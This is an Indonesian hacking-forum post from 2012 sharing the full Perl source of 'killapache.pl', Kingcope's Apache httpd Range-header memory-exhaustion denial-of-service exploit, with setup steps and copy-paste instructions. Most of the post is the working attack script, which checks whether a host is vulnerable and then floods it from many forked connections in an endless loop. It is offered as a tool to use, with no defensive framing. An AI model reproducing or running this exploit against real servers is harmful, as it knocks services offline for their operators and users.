X-code Professional

X-code Community

Facebook group

Instagram X-code

Twitter

X-code Blog

Panel
Welcome! Anonymous

Apache httpd Remote Denial of Service (memory exhaustion)

[ { NUM_COMMENT }]

Tempat pembahasan dan tutorial penggunaan tools untuk hacking, security dan forensik komputer.

Moderators: Paman, Xshadow, indounderground

Forum rules
Tool yang diupload oleh member tidak diperiksa oleh kami, mungkin saja terinfeksi oleh malware secara disengaja ataupun tidak, saran kami sebaiknya mendownload tool tersebut dari sumber pembuatnya. Bagi yang buat thread diharapkan menampilkan screenshot tool.

Apache httpd Remote Denial of Service (memory exhaustion)

Postby Digital Cat » Tue Jan 10, 2012 11:19 pm

Lagi.. lagi.. tools lawas Agustus lalu..

yang kan menghasilkan

Jangan lupa lagi install perl dan instal komponennya Parallel - ForkManage,setelah install perl
dengan menjalankan perintah ini di command prompt

contoh di
Code: Select all
perl -MCPAN -e "install Parallel::ForkManager"


Image


Preview Program

Image
Copy dan pastekan code berikut di notepad dan save as,"killapache.pl"

Code: Select all
use IO::Socket;
use Parallel::ForkManager;
 
sub usage {
    print "Apache Remote Denial of Service (memory exhaustion)\n";
    print "by Kingcope\n";
    print "usage: perl killapache.pl <host> [numforks]\n";
    print "example: perl killapache.pl www.example.com 50\n";
}
 
sub killapache {
print "ATTACKING $ARGV[0] [using $numforks forks]\n";
     
$pm = new Parallel::ForkManager($numforks);
 
$|=1;
srand(time());
$p = "";
for ($k=0;$k<1300;$k++) {
    $p .= ",5-$k";
}
 
for ($k=0;$k<$numforks;$k++) {
my $pid = $pm->start and next; 
     
$x = "";
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => "80",
                                 Proto    => 'tcp');
 
$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;
 
while(<$sock>) {
}
 $pm->finish;
}
$pm->wait_all_children;
print ":pPpPpppPpPPppPpppPp\n";
}
 
sub testapache {
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => "80",
                                 Proto    => 'tcp');
 
$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;
 
$x = <$sock>;
if ($x =~ /Partial/) {
    print "host seems vuln\n";
    return 1; 
} else {
    return 0; 
}
}
 
if ($#ARGV < 0) {
    usage;
    exit; 
}
 
if ($#ARGV > 1) {
    $numforks = $ARGV[1];
} else {$numforks = 50;}
 
$v = testapache();
if ($v == 0) {
    print "Host does not seem vulnerable\n";
    exit; 
}
while(1) {
killapache();
}
User avatar
Digital Cat
 
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA

{ FACEBOOK_COMMENT }

Return to Tools For Hacking - Security & Computer Forensic

Who is online

Users browsing this forum: No registered users and 20 guests